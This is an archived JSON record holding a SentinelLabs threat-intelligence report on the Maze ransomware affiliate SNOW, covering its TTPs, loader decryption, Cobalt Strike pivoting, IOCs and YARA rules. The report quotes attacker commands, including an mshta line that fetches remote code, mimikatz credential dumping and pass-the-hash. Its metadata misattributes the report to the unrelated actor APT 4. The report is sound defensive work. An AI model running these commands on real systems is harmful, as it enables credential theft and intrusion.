{
	"id": "1370a8d6-2ec4-466f-a9dc-466db9dca742",
	"created_at": "2026-04-06T00:13:43.230223Z",
	"updated_at": "2026-04-10T03:30:47.723018Z",
	"deleted_at": null,
	"sha1_hash": "aa90d72b1ed906edea6a107f142c1571b098ca56",
	"title": "Enter the Maze: Demystifying an Affiliate Involved in Maze (SNOW) - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2523111,
	"plain_text": "Enter the Maze: Demystifying an Affiliate Involved in Maze\r\n(SNOW) - SentinelLabs\r\nBy Jason Reaves\r\nPublished: 2020-07-22 · Archived: 2026-04-05 13:33:18 UTC\r\nAffiliate involved in Maze ransomware operations profiled from the actor perspective while also detailing their\r\ninvolvement in other groups.\r\nBy Jason Reaves and Joshua Platt\r\nExecutive Summary\r\nMaze continues to be one of the most dangerous and actively developed ransomware frameworks in the\r\ncrimeware space.\r\nMaze affiliates utilize red team tools and frameworks but also a custom loader commonly named\r\nDllCrypt[9].\r\nMaze affiliates utilize other malware and are involved with other high-end organized crimeware groups\r\nconducting systematic corporate data breaches, including Zloader, Gozi and TrickBot, as we will\r\ndemonstrate in our profiling of Maze affiliate SNOW.\r\nBackground\r\nMaze ransomware became famous for moving from widespread machine locking to corporate extortion with a\r\nblackmail component. Like most cybercrime groups, their intention is to maximize profits. As companies have\r\nadapted to the threat of ransomware by improving backup solutions and adding more layers of protection, the\r\nransomware actors would noticeably see a hit in their returns as companies refused to pay. It makes sense, then,\r\nsince the network has already been infiltrated, to add another layer in the form of a blackmail component by stealing\r\nsensitive data.\r\nResearch Insight\r\nMost of the existing research into Maze shows that it is frequently a secondary or tertiary infection vector[8]. This\r\nmeans it is leveraged after the initial access phase, which is frequently reported to be through RDP[5,6].\r\nTherefore, finding the loader being leveraged for delivering the Maze payload in memory is something that\r\ndoesn’t happen very frequently. 
This loader has been leveraged in its unpacked form[9] being directly downloaded\r\n(hxxp://37[.]1.210[.]52/vologda.dll).\r\nServer\r\nWhile researching the custom loader, we discovered an active attack server leveraged by a Maze affiliate, SNOW.\r\nhttps://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/\r\nPage 1 of 17\n\nTools\r\nGMER\r\nMimikatz\r\nMetasploit\r\nCobalt Strike\r\nPowerShell\r\nAdFind\r\nKoadic\r\nPowerShell Empire\r\nVictimology\r\nLaw firms\r\nDistributors and Resellers\r\nTTPs\r\nInitial Access\r\nBruting T1078\r\nSMB exploitation T1190\r\nRDP T1133\r\nExecution\r\nwhoami /priv T1059\r\nwhoami /groups T1059\r\nklist T1059\r\nnet group \"Enterprise Admins\" /domain T1059\r\nnet group \"Domain Admins\" /domain T1059\r\nmshta http://x.x.x.x/ktfrJ T1059\r\npowershell Find-PSServiceAccounts T1059\r\nPersistence \u0026 Privilege Escalation\r\nelevate svc-exe T1035, T1050\r\nelevate uac-token-duplication T1088, T1093\r\njump psexec_psh T1035, T1050\r\nDefense Evasion\r\nProcess injection to hide beacon\r\ninject 24636 x64 T1055\r\nCredential Access\r\nmimikatz sekurlsa::logonpasswords T1003, T1055, T1093\r\nhashdump T1003, T1055, T1093\r\nDiscovery\r\nportscan T1046\r\nnet share T1135, T1093\r\nLateral Movement\r\nmimikatz sekurlsa::pth T1075, T1093\r\nSMB exploitation T1210\r\nNetwork shares T1021\r\nPsexec T1077\r\nAttack Overview\r\nInitial access involved using an infected system with RDP opened to the internet for scanning; the scanning performed\r\nwas both SMB and RDP based.\r\nOnce the actor has an infected system, they will sometimes reuse it for further scanning, either internally or\r\nexternally.\r\nExample of the actor leveraging Metasploit for SMB scanning:\r\nuse auxiliary/scanner/smb/smb_ms17_010\r\nThe actor also leveraged Cobalt Strike on selected infections to perform RDP scanning using 
portscan.\r\nMultiple check-in logs indicated the beacon’s preferred stager parent was PowerShell.\r\nprocess: powershell.exe; pid: 28068; os: Windows; version: 10.0; beacon arch: x64 (x64)\r\nMultiple systems the actor gained initial access to had no Administrator access, so the actor frequently would then\r\nbegin looking for other systems and mapping out the network (recon).\r\nThe actor was also very patient in these situations, choosing to focus on several persistence paths using multiple\r\nbackdoors and waiting in the hopes that someone would log in to the system with higher access. The actor would\r\nsometimes let these infections sit for 2-3 days before logging back in and checking them.\r\nIf the actor did have higher privileges, then they would frequently attempt to escalate using the methods outlined\r\nunder Privilege Escalation in the TTP (Tactics, Techniques and Procedures) section above. 
The actor would begin\r\nlooking for other systems they could access using existing credentials, mapped shares, other harvested credentials,\r\nor vulnerabilities.\r\nOnce the actor had mapped out the network and harvested credentials from normal workstations, they would\r\nattempt to pivot to higher-profile servers such as the domain controller.\r\nDue to the likelihood of the actor exfiltrating data or performing ransom activities, the investigation ends here with\r\nthe takedown of the server.\r\neCrime Overlaps\r\nBefore looking at the overlaps, we should explain that this actor uses a particular loader that is designed to\r\ndetonate the onboard protected Maze file.\r\nMost of the loaders discovered start with a killswitch check; this loader has one such string right at the start:\r\nIn the event that the file “C:AhnLabSucks” exists, the DLL will print the message “Ahnlab really sucksn”\r\nand will then exit.\r\nIf it doesn’t exist, it begins allocating memory and copying over data:\r\nNext, some hardcoded strings are loaded:\r\nEventually, this leads to a function call that is sitting in a loop along with a sub-loop for XORing. This is a\r\ncommonly seen code structure for encryption algorithms such as AES.\r\nThis, however, is not AES; it turns out to be Sosemanuk[7]. If you’ve never identified encryption or compression\r\nalgorithms before, hardcoded values are a good place to start when trying to identify the routine. 
Take for example\r\nthis hardcoded DWORD value:\r\nSearching for this value led me to the Sosemanuk source code, which I then compared with what I was seeing in the\r\nbinary:\r\nunum32 tt, or1;\r\ntt = XMUX(r1, s ## x1, s ## x8);\r\nor1 = r1;\r\nr1 = T32(r2 + tt);\r\ntt = T32(or1 * 0x54655307);\r\nr2 = ROTL(tt, 7);\r\nPFSM;\r\n} while (0)\r\nThere were also a number of hardcoded tables used:\r\nA search for ‘0xe19fcf13’ gets us hits for Sosemanuk source code, and we can find the tables pretty easily in\r\nthe source:\r\nstatic unum32 mul_a[] = {\r\n0x00000000, 0xE19FCF13, 0x6B973726, 0x8A08F835,\r\n0xD6876E4C, 0x3718A15F, 0xBD10596A, 0x5C8F9679,\r\n0x05A7DC98, 0xE438138B, 0x6E30EBBE, 0x8FAF24AD,\r\n\u003c..snip..\u003e\r\nstatic unum32 mul_ia[] = {\r\n0x00000000, 0x180F40CD, 0x301E8033, 0x2811C0FE,\r\n0x603CA966, 0x7833E9AB, 0x50222955, 0x482D6998,\r\n0xC078FBCC, 0xD877BB01, 0xF0667BFF, 0xE8693B32,\r\n\u003c..snip..\u003e\r\nAfter downloading the source and building it into a shared object library, we can utilize this shared object file\r\nfrom Python. 
To test, I ripped out the small block of data that was copied over and then used the Sosemanuk\r\nPython script that was provided by the package at https://www.seanet.com/~bugbee/crypto/sosemanuk/.\r\npySosemanuk version: 0.01\r\n*** good ***\r\n\u003e\u003e\u003e key = 'IDZT6frSHDHsfdsffiFduffz8GD7sddg'\r\n\u003e\u003e\u003e iv = '832748zr89243zr7'\r\n\u003e\u003e\u003e sm = Sosemanuk(key,iv)\r\n\u003e\u003e\u003e data = open('small.bin', 'rb').read()\r\n\u003e\u003e\u003e t = sm.decryptBytes(data)\r\n\u003e\u003e\u003e t\r\n'Ux89xe5x83xec8dxa10x00x00x00x8b@x0cx8b@x14x8bx00x8bx00x8b@x10x89Exfcx8bExfcx89x04$xc7D$x04xaaxfcr|xe\r\nThis turns out to be the code that will map a binary into memory:\r\nThere is also a larger chunk of data that will be copied over later:\r\nWe can hazard a guess this will be a PE file, but since the same Sosemanuk encryption key and IV will be utilized\r\nwe can just decrypt and check:\r\npySosemanuk version: 0.01\r\n*** good ***\r\n\u003e\u003e\u003e key = 'IDZT6frSHDHsfdsffiFduffz8GD7sddg'\r\n\u003e\u003e\u003e iv = '832748zr89243zr7'\r\n\u003e\u003e\u003e sm = Sosemanuk(key,iv)\r\n\u003e\u003e\u003e help(sm)\r\n\u003e\u003e\u003e data = open('large.bin', 'rb').read()\r\n\u003e\u003e\u003e t = sm.decryptBytes(data)\r\n\u003e\u003e\u003e t[:100]\r\n'MZx90x00x03x00x00x00x04x00x00x00xffxffx00x00xb8x00x00x00x00x00x00x00@x00x00x00x00x00x00x00x00x00x00x\r\nMaze\r\nAfter decrypting the payload, it is very easy to identify it as a sample of Maze ransomware:\r\nThere are two interesting overlaps involving this Maze Loader. 
The first is that one of the actor’s recovered\r\nsamples was a crypted sample of a Maze loader with a certificate chain onboard from Sectigo for\r\n“BCJTJEJXDCZSKZPJGJ0”.\r\nPivoting on this chain leads us to a number of eCrime malware families that have previously been used for delivering\r\nsecond-stage malware.\r\nGozi:\r\n4f61fcafad37cc40632ad85e4f8aa503d63700761e49db19c122bffa7084e4ec\r\nb9127a38c105987631df3a245c009dc9519bb790e27e8fd6de682b89f76d7db8\r\n6e5d049342c2fe60fad02a5ab494ff9d544e7952f67762dbd183f71f857b3e66\r\nbaea0b117de8a7f42ff04d69c648fe5ec7ae8ad886b6fa9e039d9d847577108d\r\nZloader:\r\n6fed2a5943e866a67e408a063589378ae4ce3aa2907cc58525a1b8f423284569\r\nZloader botnet: main\r\nGozi Serpent keys: 7J79T4MEk8rkf3MT, 7EIrW8BoJ9xkYsKU, 21291029JSJUXMPP\r\nAlso interesting is that the new Gozi being utilized by Gozi ConfCrew[10] uses one of these keys for their loader\r\nservice: ‘21291029JSJUXMPP’.\r\nSecondly, during our investigation of a packed sample of this loader, we noticed that it was delivering Maze with a\r\nvery distinctive crypter commonly associated with TrickBot.\r\nTrickBot Crypter\r\nThe crypter being used here is one that is predominantly utilized by TrickBot customers. The latest variant is easy\r\nto identify due to its continued use of VirtualAllocExNuma and a modified RC4 routine.\r\nThe string “383669855” is the ROR-13 hash of VirtualAllocExNuma after being uppercased.\r\n\u003e\u003e\u003e a = 'virtualallocexnuma'.upper()\r\n\u003e\u003e\u003e a\r\n'VIRTUALALLOCEXNUMA'\r\n\u003e\u003e\u003e h = 0\r\n\u003e\u003e\u003e for c in a:\r\n...  h = ror(h, 13)\r\n...  
h += ord(c)\r\n...\r\n\u003e\u003e\u003e h\r\n383669855\r\nAfter being resolved, it will be used to allocate a large chunk of memory and have the data copied over.\r\nThe data will then be decrypted using a slightly modified version of RC4 in which the S-box size is extended.\r\nAfter unpacking we are left with a DLL. This DLL turns out to be the Maze Loader that we discussed earlier.\r\nThis loader also has a certificate appended to it in the overlay data:\r\nCertificate:\r\nData:\r\nVersion: 3 (0x2)\r\nSerial Number:\r\n02:ac:5c:26:6a:0b:40:9b:8f:0b:79:f2:ae:46:25:77\r\nSignature Algorithm: sha1WithRSAEncryption\r\nIssuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance EV Root\r\nValidity\r\nNot Before: Nov 10 00:00:00 2006 GMT\r\nNot After : Nov 10 00:00:00 2031 GMT\r\nSubject: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance EV Roo\r\nSubject Public Key Info:\r\nPublic Key Algorithm: rsaEncryption\r\nThe overlay certificate even includes the WIN_CERTIFICATE structure, so it was possibly ripped off a binary and\r\nthen appended to the end of the file.\r\nFinding Structure in Noise\r\nAs previously mentioned, we began tracking this actor’s attack servers, which predominantly leverage the use of\r\nCobalt Strike. However, trying to pivot on a tool like Cobalt Strike can be challenging, as you will get lost in a sea\r\nof data pretty quickly. It can be easy to simply look for beacons using the same IOC and pivot on that, but that is\r\nnaive, so we decided to look for some other ways. 
It’s worth mentioning that this is a very important reason why\r\nthreat intel needs reverse-engineers: they provide a further technical look at the data to try to pivot on, much the same\r\nway an attacker or a pentester will try to pivot when looking at infrastructure. The same techniques and approaches\r\nshould be utilized in malware research, bridging the technical gap between malware reverse-engineering and threat intel.\r\nThe Cobalt Strike beacons discovered here provide an excellent opportunity to showcase this methodology using a\r\nreal-world example. Let’s take a recovered beacon from this investigation where the attacker was using the leaked\r\nversion of Cobalt Strike.\r\n'WATERMARK': '305419896'\r\nThe above is the watermark value from the recovered Cobalt Strike beacon config. These values are stored packed in\r\na structure that is XOR-encoded inside of the beacons. This data is signaturable, however. Let’s take a look:\r\n\u003e\u003e\u003e b = struct.pack('\u003eI', 305419896)\r\n\u003e\u003e\u003e t.find(b)\r\n240590\r\n\u003e\u003e\u003e t[240580:240600]\r\nbytearray(b'x00x00x00x00x00%x00x02x00x04x124Vxx00\u0026x00x01x00x02')\r\n\u003e\u003e\u003e chr(37)\r\n'%'\r\n\u003e\u003e\u003e t2 = 'x00x00x00x00%x00x02x00x04x124Vx'\r\n37 is the ID used to designate the watermark value inside the beacon config. To pivot on this data in OSINT, all\r\nwe need to do is look for the data block above. For the purposes of this write-up, I will only show a simple example\r\nwhere we use the default XOR key for Cobalt Strike beacon configs:\r\n\u003e\u003e\u003e import binascii\r\n\u003e\u003e\u003e binascii.hexlify(t2)\r\n'00000000250002000412345678'\r\n\u003e\u003e\u003e t3 = bytearray(t2)\r\n\u003e\u003e\u003e for i in range(len(t3)):\r\n...  
t3[i] ^= 0x2e\r\n...\r\n\u003e\u003e\u003e binascii.hexlify(t3)\r\n'2e2e2e2e0b2e2c2e2a3c1a7856'\r\nTaking a look at the results in VirusTotal:\r\nSo now we have at least narrowed our sea of Cobalt Strike beacons down a bit to a pool of \u003c100 samples.\r\nWhile looking at the config data for these beacons, we notice more trends that begin to stick out:\r\nMozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)\r\nLeading to possibly more related infrastructure:\r\n'SUBMITURI': '/submit.php', 'DOMAINS': '217.12.218[.]99,/ptj'\r\nAnother interesting aspect of this watermark is that it shows up at the end of the PowerShell stager shellcode as\r\nwell:\r\nx00x00Pxc3xe8x9fxfdxffxff37.1.210[.]52x00x124Vx\")\r\nAs mentioned, this leads to other infrastructure that could be used by either this affiliate or another affiliate\r\ninvolved in Maze. The investigation is ongoing as the actors appear to be very active.\r\nConclusion\r\nIn this paper we have covered tracking and profiling one of the actors involved in Maze ransomware while also\r\ndiscovering intel on his involvement with multiple other major eCrime families including Zloader, Gozi and\r\nTrickBot.\r\nThe notorious ransomware group Maze, which leverages blackmail and data theft on top of file locking, is now\r\nfound with evidence of an affiliate being involved in multiple major eCrime groups and utilizing a service that is\r\npredominantly associated with TrickBot and their customers. 
Most of the major crimeware families have\r\ncapabilities to deliver other files, and this means more things to think about for enterprise defenders as alerts are\r\nprioritized: dwell time can be a gamble, and it’s no longer safe to assume that an infection will act a\r\ncertain way.\r\nIOCs\r\nUnpacked samples:\r\n85e38cc3b78cbb92ade81721d8cec0cb6c34f3b5\r\n07849ba4d2d9cb2d13d40ceaf37965159a53c852\r\nIPs\r\n37[.]1[.]210[.]52\r\nMitigation \u0026 Recommendations\r\nEndpoint\r\nKillSwitch file: C:AhnLabSucks\r\nYARA\r\nrule trick_crypter_vallocnuma_hash\r\n{\r\n    strings:\r\n        $a1 = \"383669855\"\r\n    condition:\r\n        all of them\r\n}\r\nrule Maze_Loader\r\n{\r\n    strings:\r\n        $sosemanuk_key = \"IDZT6frSHDHsfdsffiFduffz8GD7sddg\"\r\n        $ahnlab_messages1 = \"Ahnlab really sucks\"\r\n        $ahnlab_messages2 = \"AhnLabSucks\"\r\n    condition:\r\n        $sosemanuk_key or all of ($ahnlab_messages*)\r\n}\r\nReferences\r\n1: https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/\r\n2: https://www.fidelissecurity.com/threatgeek/archive/trickbot-we-missed-you-dyre/\r\n3: https://www.sentinelone.com/labs/anchor-project-the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/\r\n4: https://www.sentinelone.com/labs/maze-ransomware-update-extorting-and-exposing-victims/\r\n5: https://threatpost.com/maze-ransomware-cognizant/154957/\r\n6: https://twitter.com/VK_Intel/status/1251388507219726338\r\n7: https://www.seanet.com/~bugbee/crypto/sosemanuk/\r\n8: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\r\n9: https://twitter.com/malwrhunterteam/status/1265317887167926272\r\n10: https://www.sentinelone.com/labs/valak-malware-and-the-connection-to-gozi-loader-confcrew/\r\nSource: 
https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/"
	],
	"report_names": [
		"enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow"
	],
	"threat_actors": [
		{
			"id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337",
			"created_at": "2022-10-25T16:07:23.318008Z",
			"updated_at": "2026-04-10T02:00:04.539063Z",
			"deleted_at": null,
			"main_name": "APT 4",
			"aliases": [
				"APT 4",
				"Bronze Edison",
				"Maverick Panda",
				"Salmon Typhoo",
				"Sodium",
				"Sykipot",
				"TG-0623",
				"Wisp Team"
			],
			"source_name": "ETDA:APT 4",
			"tools": [
				"Getkys",
				"Sykipot",
				"Wkysol",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434423,
	"ts_updated_at": 1775791847,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.pdf",
		"text": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.txt",
		"img": "https://archive.orkl.eu/aa90d72b1ed906edea6a107f142c1571b098ca56.jpg"
	}
}